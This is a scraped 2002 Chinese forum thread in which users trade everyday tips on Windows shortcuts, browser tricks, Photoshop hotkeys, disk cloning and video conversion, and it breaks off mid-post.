 发表于 2002-06-30 05:26:01 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP
windows下文件可以只有扩展名！

新建一个文本文档另存为.txt.前面什么也不要加，就可以了，但是你不能重命名为这样的文件名！要用另存为！

点个链接试试
http://www.52nh.com/hw/soft/.js

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
51window_asp_Beta

这个主题共有2页：1 2 上一贴 | 下一贴
快速回复 主题：＠好技巧、新发现(欢迎大家参与)！
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


＠好技巧、新发现(欢迎大家参与)！ - 经 典 论 坛

计算机技术
＠好技巧、新发现(欢迎大家参与)！ (页 1)

这个主题共有2页：1 2 上一贴 | 下一贴
发表人 主题: ＠好技巧、新发现(欢迎大家参与)！
51windows

海娃
积分：4489
发帖：1308
来自：湖南－山东
注册：2001-12-02
 发表于 2002-06-14 09:31:50 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 收藏该主题供以后查看 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP
为了活跃计算机技术版的气氛,更好的使大家交流自己平时操作计算机的心得等,现举行一个小小的活动:

大家把自己使用计算机(包括系统操作,上网,硬件相关等)时的新技巧、新发现、好心得写下来与大家共享!你可能很熟悉的操作,别人可能不知道!一人一个技巧,加起来就是很多个技巧!欢迎大家参与!

对于好的贴子进行优先打分

注意:贴子最好不要太长!请不要灌水,灌水的贴子一律删除！

请大家不要讨论，过一段时间后，会开一个讨论的贴子，谢谢合作!

----------------------------------
我先开个头:

1.有时候装软件或补丁的时候,完成后要重启系统,而对话框只有一个"确定",你又不要重启计算机,怎么办?

一种方法：
打开计事本,随便输入一些内容,不要管它了,点那个重启对话框的确定,当计事本对话框提示时,选"取消",这样系统就不重启了!不过这样可能对系统不太好,建议还是重启一下!

2.双击窗口左上角的图标可以关闭窗口,你用过没有?

[这消息被51windows编辑过(编辑时间2002-06-14 17:52:22)]

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
51window_asp_Beta

继续努力

终级用户
积分：474
发帖：135
来自：
注册：2002-02-16
 发表于 2002-06-14 10:36:03 按此观看继续努力的个人资料 按此发邮件给继续努力 访问继续努力的主页 继续努力 的 oicq 是88300297,查看 88300297 的资料 发送悄悄话给继续努力 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看继续努力的IP
一时想不出来太多的，我也来说两个：
1、快速关闭多个窗口：如果同时有多个窗口打开，想要关闭的话，可以按住shift不放然后点击窗口右上角的关闭图标。
2、在多个任务之间切换：用alt+tab组合键。

朝为田舍郎，暮登风子堂。
将相本无种，男儿当自强。
啸

无意
现任版主
积分：6219
发帖：2154
来自：
注册：2000-08-01
 发表于 2002-06-14 11:32:09 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
想到什么说什么，以后再添

1、浏览器相关

在保存网页前，可以按一下"ESC"键再保存。（有时一个网页没完全下载完就点保存，会因为一张图片没能下载而卡在那里不能保存，Esc键和IE上的停止键是同一功能。）

2、播放CD

用电脑听CD可以不用任何的播放软件，把音箱线直接接到光驱的耳机孔，放入CD，按光驱上的play键就可以直接听了，这样听歌可以不占用系统资源。（如果你的电脑坏了，不能启动或什么的，一时放在那不能修，千万不要浪费资源，把用里面的电源给光驱通上电，就可以暂时做CD机了 [image] ）

休整一段时间。

Blueidea Web Team.
Moderator Of Computer Technology Forum

天蓝

超级用户
积分：395
发帖：108
来自：蓝色天空
注册：2002-05-17
 发表于 2002-06-14 12:10:14 按此观看天蓝的个人资料 该用户不允许显示它的电子邮件 天蓝 的 oicq 是2923431,查看 2923431 的资料 发送悄悄话给天蓝 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天蓝的IP
1、MSN中发消息的时候是按enter的，如果想要换行而不想发出消息，可以shift+enter。

2、浏览器的地址栏里可以调试简短的HTML代码。方法如下： 地址栏写about:<font color="#0000ff">abc</font> 回车，就看到效果了。

天空是什么颜色的，如果汪洋是蓝色的；我说天空也是蓝色的，因为他们彼此相爱了。
cvbfight

高级用户
积分：256
发帖：66
来自：
注册：2002-02-09
 发表于 2002-06-14 12:58:21 按此观看cvbfight的个人资料 按此发邮件给cvbfight 发送悄悄话给cvbfight 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cvbfight的IP
win+m 显示桌面
win+pause 系统属性

我想多说点,可又没什么说的,呵呵~!

不懂什么，就喜欢插嘴。
浸食·花葬

极度色郎
积分：7812
发帖：2959
来自：|翅膀|
注册：2001-07-09
 发表于 2002-06-14 13:04:43 按此观看浸食·花葬的个人资料 按此发邮件给浸食·花葬 访问浸食·花葬的主页 浸食·花葬 的 oicq 是7368317,查看 7368317 的资料 发送悄悄话给浸食·花葬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看浸食·花葬的IP
51windows在上个帖子中说
引用:
1.有时候装软件或补丁的时候,完成后要重启系统,而对话框只有一个"确定",你又不要重启计算机,怎么办?

一种方法：
打开计事本,随便输入一些内容,不要管它了,点那个重启对话框的确定,当计事本对话框提示时,选"取消",这样系统就不重启了!不过这样可能对系统不太好,建议还是重启一下!

不如直接把這個進程掐掉 ~

幕末 ——
京都に人斬り拔刀齋と呼ばれた志士がぃた.
修羅さながらに人を斬り.その血刀を以って新
時代『明治』を切り拓ぃたその男は.動亂の
終結と共に人々の前から姿を消した ——
wangjac

终级用户
积分：581
发帖：221
来自：CM
注册：2002-01-21
 发表于 2002-06-14 13:23:30 按此观看wangjac的个人资料 按此发邮件给wangjac 发送悄悄话给wangjac 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看wangjac的IP
快速重新启动:按确定前先按shift.

彻底删除:shift+del

不让光盘自动运行:按shift

「Ｃtrl」+「Esc」：相当于"开始"或WIN键
「Ｃtrl」+「Home」：将游标移至文字编辑区的开始始(Home单用：移至列首)
「Ｃtrl」+「End」：将光标移至文字编辑区的终点(End单用：移至列尾)

「Ａlt」+「Ｆ4」：关闭当前视窗（若是点一下桌面再按则为关机)

「Ｆ2」：更改名称

呵呵,想到再补充.....

YO SOY EL Diego!
wangjac

终级用户
积分：581
发帖：221
来自：CM
注册：2002-01-21
 发表于 2002-06-14 13:29:42 按此观看wangjac的个人资料 按此发邮件给wangjac 发送悄悄话给wangjac 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看wangjac的IP
<关机快捷方式>
(1). 在桌面空白位置按鼠标右键 -> <新建> -> 选<快捷方式>
(2). 在<指令行>键入 rundll.exe user.exe,exitwindows
(3). 在<选择快捷方式 的名称>键入<关闭Window>或你想要的名称 -> 按<完成>

<重新启动快捷方式>
(1). 重复以上 (1)
(2). 在<指令行>键入 rundll.exe user.exe,exitwindowsexec
(3). 在<选择快捷方式的名称>键入<重新启动Restart>或你想要的名称 -> 按<完成>

YO SOY EL Diego!
flyingbird

想飞的心
积分：4719
发帖：1816
来自：
注册：1999-12-22
 发表于 2002-06-14 13:41:01 按此观看flyingbird的个人资料 按此发邮件给flyingbird 发送悄悄话给flyingbird 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看flyingbird的IP
Windows环境下：

RUN - > cmd 或者command
就会看到DOS窗口。不知道大家注意到那个小小的图标没有，在左上角。

点击这个图标， 就会看到下拉菜单， 尤其是Edit下的一些功能， 很方便。

记忆珍藏那些灵动如鸽、温馨如语、朗澈如风、逸动如绸的片段……

Blueidea Web Team
Team member

cancan

质子
积分：209
发帖：145
来自：shanghai
注册：2001-04-06
 发表于 2002-06-14 13:59:01 按此观看cancan的个人资料 按此发邮件给cancan 访问cancan的主页 cancan 的 oicq 是44787750,查看 44787750 的资料 发送悄悄话给cancan 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cancan的IP
补充无意的"浏览器相关":

保存网页时直接文件>另存为,速度有时会很慢.
这样,文件>脱机工作,再文件>另存为,很快.

思 者 无 疆
潜水员

超级用户
积分：315
发帖：180
来自：
注册：2000-06-26
 发表于 2002-06-14 14:04:34 按此观看潜水员的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给潜水员 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看潜水员的IP
cancan在上个帖子中说
引用:
这样,文件>脱机工作,再文件>另存为,很快.

选择脱机，会使其它不需要保存的页面也脱机，浏览其他的就要再连接。
此技巧不实用。

我厌倦了灌水，因为我在水下呆的时间太长............
cancan

质子
积分：209
发帖：145
来自：shanghai
注册：2001-04-06
 发表于 2002-06-14 14:38:11 按此观看cancan的个人资料 按此发邮件给cancan 访问cancan的主页 cancan 的 oicq 是44787750,查看 44787750 的资料 发送悄悄话给cancan 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cancan的IP
潜水员在上个帖子中说
引用:
cancan在上个帖子中说
引用:
这样,文件>脱机工作,再文件>另存为,很快.

选择脱机，会使其它不需要保存的页面也脱机，浏览其他的就要再连接。
此技巧不实用。

有时候你其他的网页都已经完全打开,但是就需要保存这张网页,速度又很慢,我觉得这样还是蛮有用的.

思 者 无 疆
51windows

海娃
积分：4489
发帖：1308
来自：湖南－山东
注册：2001-12-02
 发表于 2002-06-14 17:44:10 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP
con、nul是M$系统的保留名，它不能做为文件名！

检查你的web空间是不是M$系统，可以建一个con的文件夹试试

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
51window_asp_Beta

2smile

活着就好
积分：1811
发帖：2105
来自：SD
注册：2001-05-13
 发表于 2002-06-14 19:02:01 按此观看2smile的个人资料 按此发邮件给2smile 访问2smile的主页 发送悄悄话给2smile 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看2smile的IP
下面都是我平时遇到的和记得住的一些小技巧,希望对你有用:

  • Photoshop 中按Ctrl+Alt+Z是撤销键,无限制撤销,不同于Ctrl+Z.

  • Windows 2000中,如果Explorer停止响应,可以按Ctrl+Alt+Del键关闭Explorer进程.如果关闭后没有任何反应,比如桌面任务栏都没了,这时可以在Task Manager中新建一个任务,也就是运行:Explorer.

  • 在很多Vbb论坛中, 输入发表内容后可以按一下Tab键,然后直接回车,这样会自动把焦点移到"发表"按钮. 在ActiveUBB中同样适应,虽然焦点不在"发送回帖"上.比如我在这里发帖都是这样.

  • 有一些软件从硬盘安装时可能会出现错误,比如 Office XP MUI, 3DS Max 4.2, 直接从硬盘安装会出现错误提示,不能安装.这时,你可以把它刻盘,从光盘安装,便会正常进行.或者用ISO制作软件(比如WinISO)做成一个ISO文件, 然后用Deamon-Tools虚拟光驱安装.

  • 是不是发现Windows XP中的NTFS管理与Windows 2000中不一样了?在文件夹选项中,去掉"简单共享"选项,然后就可以跟2k一样设置NTFS权限了.

  • Nero 5.5.8.2已经整合Nero Express. 在启动Nero时加一个参数"/w",这时启动的便是Nero Express.

  • 天网防火墙有时可能导至系统崩溃.如果你遇到windows 2k启动蓝屏,而且有这个提示:
    "This driver may be at fult :SKNFW.SYS", 这就是天网惹得祸,进入安全模式,将天网卸载就行了.

  • 你想换硬盘吗?如何把旧盘上的东西安全搬到新盘上? 两个硬盘不同型号大小? 还要保留原系统不变?这时可以由Ghost帮忙了.使用Ghost 6.5以上版本,使用Disk to disk功能, 可以轻松完成这个功能, 速度非常快, 而且可以自定义新硬盘的分区大小. 这样,新买的硬盘不用分区便可以做这一工作了.同样可以完整保留NTFS的一切权限设置.

  • 你想把从网上下载的Divx-DVDRip刻成VCD盘拿到VCD影院设备上欣赏吗? 用一般的方法既要转换字幕,又要提取声音,还要重编码divx,非常麻烦. 现在好了,用新版本的TmpgEn可以把这一切轻松搞定. 方法如下:
    1,安装最新版本的Divx Pro 5.02
    2,下载TmpgEnc 最新版本,解压到任一目录
    3,安装最新的vobSub 2.14
    4, 运行TmpgEnc, 打开Option/Enviromental setting 对话框, 选择VFAPI plug-in 选项卡, 右键点击Directshow Multimedia File Reader, 选择Higher Priority,一直将其置于最高优先级.(如下图
    http://www.thinktip.com/bbs/usr/23/23_953_3.png
    现在可以试着转换一个divx,首先保证字幕文件与avi文件设置存放正确
    用TmpgEnc的向导模式打开一个divx文件,看一下,是不是已经把字幕读取了. (如下图)
    http://www.thinktip.com/bbs/usr/23/23_953_4.png
    是不是很简单,不过这个过程很费时间,要看你的机器配置了,最好晚上睡觉时让机器自己做这个工作,呵呵.

  • 最新版的Flashget支持下载FTP服务器子目录.进行一下简单设置,就可以完成平时你可能要用FlashFXP或者CuteFTP才能完成的工作:新建任务,在"添加新的下载任务"对话框常规选项卡中"网址"一栏输入要下载的FTP目录, 然后在高级选项卡中,将"从FTP站点下载子目录"选中,然后确定就可以了.

  • 用过NetCaptor的Quick Search功能吗? 打开Tools/QuickSearch对话框看一下里面都有什么好东东. 好,在NetCaptor地址栏里输入:"g 经典论坛",回车,看到了什么? 对,是用google搜索"经典论坛"关键字. 这便是QuickSearch.当然你可以自定义一个搜索,比如加上天网的快捷搜索的话,就是添加一个:
    http://bingle.pku.edu.cn/scripts/ftp_search.exe?word=%s&FileType=255&Range=0&cdtype=GB&NoShortCut=1

    %s便是搜索变量

    先回忆到这里吧,呵呵.不好意思,可能过长了吧?

    [这消息被2smile编辑过(编辑时间2002-06-14 19:32:26)]

    想见不如怀念?
    thinktip.com
    msn: thinktip@hotmail.com
    icq: 98885338
    • 2smile

    活着就好
    积分：1811
    发帖：2105
    来自：SD
    注册：2001-05-13
             发表于 2002-06-14 22:40:30 按此观看2smile的个人资料 按此发邮件给2smile 访问2smile的主页 发送悄悄话给2smile 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看2smile的IP
    继续:

  • 安装完Windows XP后,默认是以你的名字登录的.其实,现在已经有两个用户了,一个是你的名字,另一个用户名便是"Administrator".我想以"Administrator"用户名登录怎么办?好说.在出现Windowns XP登录画面后,按两次Ctrl+alt+del键,看出现什么了?对,是标准的windows 2000风格的登录对话框.

  • 想把自己的某个文件夹的文件做一个列表? 用什么软件呢? 不用,直接在命令行下输入 "tree /f > index.txt".打开index.txt看一下是不是一目了然.

    想见不如怀念?
    thinktip.com
    msn: thinktip@hotmail.com
    icq: 98885338
    • gq118

    弦月
    积分：1161
    发帖：1069
    来自：Cd--UeSTC
    注册：2000-07-03
             发表于 2002-06-15 09:32:09 按此观看gq118的个人资料 按此发邮件给gq118 访问gq118的主页 gq118 的 oicq 是9774743,查看 9774743 的资料 发送悄悄话给gq118 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看gq118的IP
    Photoshop快捷键超级技巧

    1. 你可以用以下的快捷键来快速浏览你的图像：
    Home卷动至图像的左上角；End卷动至图像的右下角；Page UP卷动至图像的上方；Page Down卷动至图像的下方；Ctrl＋Page Up卷动至图像的左方；Ctrl＋Page Down卷动至图像的右方。

    2. 按Ctrl键+Alt键+0键即可使图像按1:1比例显示。

    3. 当你想“紧排”(调整个别字母之间的空位)，首先在两个字母之间单击，然后按下Alt键后用左右方向键调整。

    4. 将对话框内的设定恢复为默认，先按住Alt键后，Cancel键会变成Reset键，再单击Reset键即可。

    5. 要快速改变在对话框中显示的数值，首先用鼠标点击那个数字，让光标处在对话框中，然后就可以用上下方向键来改变该数植了。如果在用方向键改变数值前先按下Shift键，那么数值的改变速度会加快。

    6. Photoshop 6.0除了以往熟悉的快捷键Ctrl+Z(可以自由地在历史记录和当前状态中切换)之外，还增加了Shift+Ctrl+Z(用以按照操作次序不断的逐步恢复操作)和Alt+Ctrl+Z(使用户可以按照操作次序不断的逐步取消操作)两个快捷键。按Ctrl+Alt+Z和Ctrl+Shift+Z组合键分别为在历史记录中向后和向前(或者可以使用历史面板中的菜单来使用这些命令)。

    7. 填充功能：
    Shift+Backspace打开填充对话框；
    Alt+Backspace和Ctrl+Backspace组合键分别为填充前景色和背景色；
    按Alt+Shift+Backspace及Ctrl+Shift+Backspace组合键在填充前景及背景色的时候只填充已存在的像素(保持透明区域)。

    8. 键盘上的D键、X键可迅速切换前景色和背景色。

    9. 用任一绘图工具画出直线笔触：先在起点位置单击鼠标，然后按住Shift键，再将光标移到终点单击鼠标即可。

    10. 打开Curve(曲线)对话框时，按Alt键后单击曲线框，可使格线更精细，再单击鼠标可恢复原状。

    11. 使用矩形(椭圆)选取工具选择范围后，按住鼠标不放，再按空格键即可随意调整选取框的位置，放开后可再调整选取范围的大小。

    12. 增加一个由中心向外绘制的矩形或椭圆形，在增加的任意一个选择区域内，先按Shift键拖动矩形或椭圆的面罩工具，然后放开Shift键，然后按Alt键，最后松开鼠标按钮再松开Alt键。按Enter键或Return键可关闭滑块框。若要取消更改，按Escape键 (Esc)。若要在打开弹出式滑块对话框时以10%的增量增加或减少数值，请按住Shift键并按上箭头键或者下箭头键。

    13. 若要在屏幕上预览RGB模式图像的CMYK模式色彩时，可先执行“视图”→“新视图”命令，产生一个新视图后，再执行“视图”→“预览”→“CMYK”命令，即可同时观看两种模式的图像，便于比较分析。

    14. 按Shift键拖移选框工具限制选框为方形或圆形；按Alt键拖移选框工具从中心开始绘制选框；按Shift+Alt键拖移选框工具则从中心开始绘制方形或圆形选框。

    15. 要防止使用裁切工具时选框吸附在图片边框上，在拖动裁切工具选框上的控制点的时候按住Ctrl键即可。

    16. 要修正倾斜的图像，先用测量工具在图上可以作为水平或垂直方向基准的地方画一条线(如图像的边框、门框、两眼间的水平线等等)，然后从菜单中选“图像”→“旋转画布”→“任意角度…”，打开后会发现正确的旋转角度已经自动填好了，只要按确定就OK啦。

    17. 可以用裁切工具来一步完成旋转和剪切的工作：先用裁切工具画一个方框，拖动选框上的控制点来调整选取框的角度和大小，最后按回车实现旋转及剪切。测量工具量出的角度同时也会自动填到数字变换工具(“编辑”→“变换” →“数字” )对话框中。

    18. 裁剪图像后所有在裁剪范围之外的像素就都丢失了。要想无损失地裁剪可以用“画布大小”命令来代替。虽然Photoshop会警告你将进行一些剪切，但出于某种原因，事实上并没有将所有“被剪切掉的”数据都被保留在画面以外，但这对索引色模式不起作用。

    18. 合并可见图层时按Ctrl+Alt+Shift+E为把所有可见图层复制一份后合并到当前图层。同样可以在合并图层的时候按住Alt键，会把当前层复制一份后合并到前一个层，但是Ctrl+Alt+E这个热键这时并不能起作用。

    19. 按Shift+Backspace键可激活“编辑”→“填充”命令对话框，按Alt+Backspace键可将前景色填入选取框；按Ctrl+Backspace键可将背景填八选取框内。

    20. 按Shift+Alt+Backspace 键可将前景色填入选取框内并保持透明设置，按Shift+CtrBackspace键可将背景色填入选取框内保持透明设置。

    21. 按Alt+Ctrl+Backspace键从历史记录中填充选区或图层，按Shift+Alt+Ctrl+Backspace键从历记录中填充选区或图层并且保持透明设置。

    22. 按Ctrl＋“＝”键可使图像显示持续放大，但窗口不随之缩小；按Ctrl＋“－”键可使图像显示持续缩小，但窗口不随之缩小；按Ctrl+Alt＋“＝”键可使图像显示持续放大，且窗口随之放大；按Ctrl+Alt＋“－”键可使图像显示持续缩小，且窗口随之缩小。

    23. 移动图层和选区时，按住Shift键可做水平、垂直或45度角的移动；按键盘上的方向键可做每次1个像素的移动；按住Shift键后再按键盘上的方向键可做每次10个像素的移动。

    24. 创建参考线时，按Shift键拖移参考线可以将参考线紧贴到标尺刻度处；按Alt键拖移参考线可以将参考线更改为水平或垂直取向。

    25. 在“图像”→“调整”→“曲线”命令对话框中，按住Alt键于格线内单击鼠标可以使格线精细或粗糙；按住Shift键并单击控制点可选择多个控制点，按住Ctrl 键并单击某一控制点可将该点删除。

    26. 若要将某一图层上的图像拷贝到尺寸不同的另一图像窗口中央位置时，可以在拖动到目的窗口时按住Shift键，则图像拖动到目的窗口后会自动居中。

    27. 在使用“编辑”→“自由变换”(Ctrl+T)命令时，按住Ctrl键并拖动某一控制点可以进行自由变形调整；按住Alt键并拖动某一控制点可以进行对称变形调整；按住Shift键并拖动某一控制点可以进行按比例缩放的调整；按住Shift+Ctrl键并拖动某一控制点可以进行透视效果的调整；按Shift+Ctrl键并拖动某一控制点可以进行斜切调整；按Enter键应用变换；按Esc键取消操作。

    28. 在色板调板中，按Shift键单击某一颜色块，则用前景色替代该颜色；按Shift+Alt键单击鼠标，则在点击处前景色作为新的颜色块插入；按Alt键在某一颜色块上单击，则将背景色变该颜色；按Ctrl键单击某一颜色块，会将该颜色块删除。

    29. 在图层、通道、路径调板上，按Alt键单击这些调板底部的工具按钮时，对于有对话框的工具可调出相应的对话框更改设置。

    30. 在图层、通道、路径调板上，按Ctrl键并单击一图层、通道或路径会将其作为选区载入；按Ctrl+Shift键并单击，则添加到当前选区；按Ctrl+Shift+Alt键并单击，则与当前选区交叉。

    31. 在图层调板中使用图层蒙板时，按Shift键并单击图层蒙板缩览图，会出现一个红叉，表示禁用当前蒙板，按Alt键并单击图层蒙板缩览图，蒙板会以整幅图像的方式显示，便于观察调整。

    32. 在路径调板中，按住Shift键在路径调板的路径栏上单击鼠标可切换路径是否显示。

    33. 更改某一对话框的设置后，若要恢复为先前值，要按住alt键、取消按钮会变成复位按钮，在复位按钮上单击即可。

    .....::::::有的野Wo!:)::::::.....
    arrive

    终级用户
    积分：1298
    发帖：433
    来自：大连
    注册：2000-12-02
             发表于 2002-06-15 19:51:03 按此观看arrive的个人资料 按此发邮件给arrive 访问arrive的主页 arrive 的 oicq 是7902765,查看 7902765 的资料 发送悄悄话给arrive 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看arrive的IP
    引用:
    ----------------------------------
    我先开个头:

    1.有时候装软件或补丁的时候,完成后要重启系统,而对话框只有一个"确定",你又不要重启计算机,怎么办?

    一种方法：
    打开计事本,随便输入一些内容,不要管它了,点那个重启对话框的确定,当计事本对话框提示时,选"取消",这样系统就不重启了!不过这样可能对系统不太好,建议还是重启一下!

    2.双击窗口左上角的图标可以关闭窗口,你用过没有?

    当然也可以使用“任务管理器”，就是点击“Ctrl+Alt+Del”,来结束任务，我用过得好使！

    Нельзя выпустить из руквозможностъ,которая случается в жизнь.
    中国坛中文网——网络技术版www.chinafen.com
    51windows

    海娃
    积分：4489
    发帖：1308
    来自：湖南－山东
    注册：2001-12-02
             发表于 2002-06-15 22:51:08 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP
    to 浸食·花葬,arrive,我用过这个方法，只是当时没有写出来！谢谢指出！

    转一个：

    告别Win98的蓝屏（初学者勿用！）
    呵呵，不要看见这个标题太兴奋了，我们根本不可能增进Win98的稳定性，我们可以做的不过是把Windows出错的蓝屏改成其它颜色（例如，更为环保的绿色^_^）。
    1.首先要出现蓝屏错误画面:你只要从A:（软驱）或光驱复制一个文件到你的硬盘上，同一时间将软盘或光盘取出来，蓝屏马上就会出现，你按Esc回到Windows。
    2.编辑System.ini，建议使用msconfig.exe。
    3.找到[386Enh]项，在其下新增一字串MessageBackColor=，等号后面是16进制数字0～F，表示错误画面的背景颜色
    4.新增一字串MessageTextColor=，等号后面是16进制数字0～F，表示错误画面的文字颜色。
    5.重新启动电脑，再重复步骤1，是不是已经告别蓝屏了？

    Blueidea Web Team.
    Moderator Of Amphitheater Forum
    .::天天学习:好好向上::. www.51windows.com
    51window_asp_Beta

    潜水员

    超级用户
    积分：315
    发帖：180
    来自：
    注册：2000-06-26
             发表于 2002-06-16 22:42:02 按此观看潜水员的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给潜水员 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看潜水员的IP
    浏览器相关：
    无边窗口，没有菜单栏，禁止用右键，怎么保存页面？

    CTRL+N，新开窗口即可。

    我厌倦了灌水，因为我在水下呆的时间太长............
    金翅

    超级用户
    积分：305
    发帖：80
    来自：甘肃，兰州
    注册：2002-05-07
             发表于 2002-06-17 01:09:24 按此观看金翅的个人资料 按此发邮件给金翅 金翅 的 oicq 是113410252,查看 113410252 的资料 发送悄悄话给金翅 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看金翅的IP
    我也来谈谈不用重起的方法：
    你可以下退出所有正在运行的软件，之后，按住CTRL,ALT,DEL之后出现关闭程序，你选择
    explorer后，结束任务，在别选择结束任务，选择取消，就好了！

    我学习我实践！
    阿修罗飞天舞

    无关风月
    现任版主
    积分：2516
    发帖：2473
    来自：杭州
    注册：2001-05-21
             发表于 2002-06-17 20:45:52 按此观看阿修罗飞天舞的个人资料 按此发邮件给阿修罗飞天舞 阿修罗飞天舞 的 oicq 是5194599,查看 5194599 的资料 发送悄悄话给阿修罗飞天舞 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿修罗飞天舞的IP
    天蓝在上个帖子中说
    引用:
    1、MSN中发消息的时候是按enter的，如果想要换行而不想发出消息，可以shift+enter。

    ctrl+enter也可以的，和qq里面对话模式的时候相仿这个方法我个人觉得比较习惯

    快速关机，呵呵ctrl+shift+del然后alt+s就可以了，因为这个方法可以让你在启动的时候不用等待所有程序启动完毕再关机，直接就可以关机所以我个人以为比较好用呢

    [这消息被阿修罗飞天舞编辑过(编辑时间2002-06-17 20:55:21)]
    [这消息被阿修罗飞天舞编辑过(编辑时间2002-06-17 20:55:51)]

    坐看秋草只须臾 秋夕惊鸿往日情 不忍萧瑟枯原景 思思念念无日月
    随风散去荻上露 薄暮伤别彷若梦 秋日难留故人心 今年今生今日尽

    Blueidea Web Team

    继续努力

    终级用户
    积分：474
    发帖：135
    来自：
    注册：2002-02-16
             发表于 2002-06-18 10:48:04 按此观看继续努力的个人资料 按此发邮件给继续努力 访问继续努力的主页 继续努力 的 oicq 是88300297,查看 88300297 的资料 发送悄悄话给继续努力 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看继续努力的IP
    如果一个文件夹下有很多文件，如果想快速找到想要的文件，先随便选择一个文件，然后在键盘上选择想要的文件的第一个字母就可以了。

    朝为田舍郎，暮登风子堂。
    将相本无种，男儿当自强。
    ※无空※

    终级用户
    积分：1272
    发帖：707
    来自：湖南@长沙
    注册：2000-11-07
             发表于 2002-06-18 14:08:02 按此观看※无空※的个人资料 按此发邮件给※无空※ ※无空※ 的 oicq 是5920158,查看 5920158 的资料 发送悄悄话给※无空※ 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看※无空※的IP
    继续努力在上个帖子中说
    引用:
    1、快速关闭多个窗口：如果同时有多个窗口打开，想要关闭的话，可以按住shift不放然后点击窗口右上角的关闭图标。

    好象不行啊，我一般关闭多窗口是按住左边的Ctrl键(注明：右边的无效 [image])在任务栏里用鼠标左键将要关闭的网页点选，然后右键“关闭”。

    欲凡醒，涤尘心，悔身之过；
    欲定志，力克己，无愧与人。
    马蜂

    在绿色中飞翔
    积分：1727
    发帖：515
    来自：你对这个世界的理解
    注册：2002-02-24
             发表于 2002-06-18 18:42:25 按此观看马蜂的个人资料 按此发邮件给马蜂 访问马蜂的主页 马蜂 的 oicq 是22324699,查看 22324699 的资料 发送悄悄话给马蜂 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看马蜂的IP
    1.ctrl+shift+I
    用关在dreamweaver中，有时候dw没有捕捉到你对修改属性的变化，比如你改了table的width的大小，而好象那个WYSIWYG并没有时世反映出来，这是你用ctrl+shift+I看起来很棒。另外，ctrl+shift+I还有更神气的功能，比如在你的design窗口里，你设table的border为1，可是还有虚线框，不是真正的浏览效果，这时你按ctrl+shift+I组合键，会惊喜的发现，他们消失的啦。
    2.注销的使用
